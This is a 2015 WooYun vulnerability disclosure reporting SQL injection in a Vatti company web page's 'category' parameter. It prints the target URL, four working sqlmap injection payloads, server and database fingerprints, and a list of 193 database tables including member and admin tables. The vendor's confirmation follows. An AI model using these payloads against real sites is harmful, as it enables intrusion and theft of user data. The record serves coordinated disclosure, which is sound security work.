当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151213

漏洞标题:华帝股份某站SQL注入漏洞(百万用户信息)

相关厂商:华帝股份有限公司

漏洞作者: miracle

提交时间:2015-11-02 09:52

修复时间:2015-12-19 10:52

公开时间:2015-12-19 10:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-02: 细节已通知厂商并且等待厂商处理中
2015-11-04: 厂商已经确认,细节仅向厂商公开
2015-11-14: 细节向核心白帽子及相关领域专家公开
2015-11-24: 细节向普通白帽子公开
2015-12-04: 细节向实习白帽子公开
2015-12-19: 细节向公众公开

简要描述:

详细说明:

http://vip.vatti.com.cn/index.php?a=designer&c=index&category=1111&m=designer&page=1 注入点:category

11.png

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: category (GET)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: a=designer&c=index&category=(SELECT (CASE WHEN (9529=9529) THEN 9529 ELSE 9529*(SELECT 9529 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&m=designer&page=1
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: a=designer&c=index&category=1111 AND (SELECT 1114 FROM(SELECT COUNT(*),CONCAT(0x71706a7071,(SELECT (ELT(1114=1114,1))),0x716b707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&m=designer&page=1
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: a=designer&c=index&category=1111 AND (SELECT * FROM (SELECT(SLEEP(5)))dNCt)&m=designer&page=1
Type: UNION query
Title: Generic UNION query (NULL) - 30 columns
Payload: a=designer&c=index&category=1111 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a7071,0x73656a6a7663694e536f,0x716b707871),NULL-- &m=designer&page=1
---
web server operating system: Windows
web application technology: Apache 2.2.25, PHP 5.2.17
back-end DBMS: MySQL 5.0
Database: hdbbs
[193 tables]
+-------------------------+
| bc_access |
| bc_attachment |
| bc_block |
| bc_cart |
| bc_category |
| bc_config |
| bc_dbsource |
| bc_field |
| bc_kefu |
| bc_lang |
| bc_link |
| bc_log |
| bc_menu |
| bc_module |
| bc_node |
| bc_online |
| bc_order |
| bc_order_data |
| bc_page |
| bc_payment |
| bc_posid |
| bc_role |
| bc_role_user |
| bc_shipping |
| bc_slide |
| bc_slide_data |
| bc_tags |
| bc_tags_data |
| bc_type |
| bc_urlrule |
| bc_user |
| bc_user_address |
| bc_winner |
| cdb_access |
| cdb_activities |
| cdb_activityapplies |
| cdb_addons |
| cdb_adminactions |
| cdb_admincustom |
| cdb_admingroups |
| cdb_adminnotes |
| cdb_adminsessions |
| cdb_advertisements |
| cdb_announcements |
| cdb_attachmentfields |
| cdb_attachments |
| cdb_attachpaymentlog |
| cdb_attachtypes |
| cdb_banned |
| cdb_bbcodes |
| cdb_caches |
| cdb_creditslog |
| cdb_crons |
| cdb_debateposts |
| cdb_debates |
| cdb_design_ad |
| cdb_designers |
| cdb_designpic |
| cdb_designpics |
| cdb_designpics_temp |
| cdb_designtype |
| cdb_designvote |
| cdb_distributor |
| cdb_dps_preply_access |
| cdb_dps_preply_posts |
| cdb_dptype |
| cdb_dtyep |
| cdb_failedlogins |
| cdb_faqs |
| cdb_favoriteforums |
| cdb_favorites |
| cdb_favoritethreads |
| cdb_feeds |
| cdb_forumfields |
| cdb_forumlinks |
| cdb_forumrecommend |
| cdb_forums |
| cdb_giftlog |
| cdb_gifts |
| cdb_gifts_ad |
| cdb_gifttype |
| cdb_handbook |
| cdb_handbook_ad |
| cdb_handbook_temp |
| cdb_handbooktype |
| cdb_imagetypes |
| cdb_invites |
| cdb_itempool |
| cdb_kc_ad |
| cdb_kc_config |
| cdb_kc_gg |
| cdb_kc_ydinfo |
| cdb_kc_yuding |
| cdb_kecheng |
| cdb_kechengtype |
| cdb_loginlog |
| cdb_magiclog |
| cdb_magicmarket |
| cdb_magics |
| cdb_medallog |
| cdb_medals |
| cdb_memberfields |
| cdb_membermagics |
| cdb_memberrecommend |
| cdb_members |
| cdb_memberspaces |
| cdb_moderators |
| cdb_modworks |
| cdb_music_info |
| cdb_mytasks |
| cdb_navs |
| cdb_onlinelist |
| cdb_onlinetime |
| cdb_orders |
| cdb_paymentlog |
| cdb_pluginhooks |
| cdb_plugins |
| cdb_pluginvars |
| cdb_polloptions |
| cdb_polls |
| cdb_postposition |
| cdb_posts |
| cdb_profilefields |
| cdb_projects |
| cdb_promotions |
| cdb_prompt |
| cdb_promptmsgs |
| cdb_prompttype |
| cdb_ques_option |
| cdb_ques_result |
| cdb_ques_topic |
| cdb_ques_user |
| cdb_ques_user_download |
| cdb_ranks |
| cdb_ratelog |
| cdb_regips |
| cdb_relatedthreads |
| cdb_reportlog |
| cdb_request |
| cdb_rewardlog |
| cdb_rsscaches |
| cdb_searchindex |
| cdb_sessions |
| cdb_settings |
| cdb_smilies |
| cdb_spacecaches |
| cdb_stats |
| cdb_statvars |
| cdb_styles |
| cdb_stylevars |
| cdb_tags |
| cdb_tasks |
| cdb_taskvars |
| cdb_teacher |
| cdb_teachervote |
| cdb_templates |
| cdb_threads |
| cdb_threadsmod |
| cdb_threadtags |
| cdb_threadtypes |
| cdb_tktools |
| cdb_tradecomments |
| cdb_tradelog |
| cdb_tradeoptionvars |
| cdb_trades |
| cdb_ttyep |
| cdb_typemodels |
| cdb_typeoptions |
| cdb_typeoptionvars |
| cdb_typevars |
| cdb_uc_admins |
| cdb_uc_applications |
| cdb_uc_badwords |
| cdb_uc_domains |
| cdb_uc_failedlogins |
| cdb_uc_feeds |
| cdb_uc_friends |
| cdb_uc_mailqueue |
| cdb_uc_memberfields |
| cdb_uc_members |
| cdb_uc_mergemembers |
| cdb_uc_newpm |
| cdb_uc_notelist |
| cdb_uc_pms |
| cdb_uc_protectedmembers |
| cdb_uc_settings |
| cdb_uc_sqlcache |
| cdb_uc_tags |
| cdb_uc_vars |
| cdb_usergroups |
| cdb_validating |
| cdb_warnings |
| cdb_words |
+-------------------------+

22.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 miracle@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-11-04 10:51

厂商回复:

谢谢作者!我们会尽快处理。

最新状态:

暂无


漏洞评价:

评论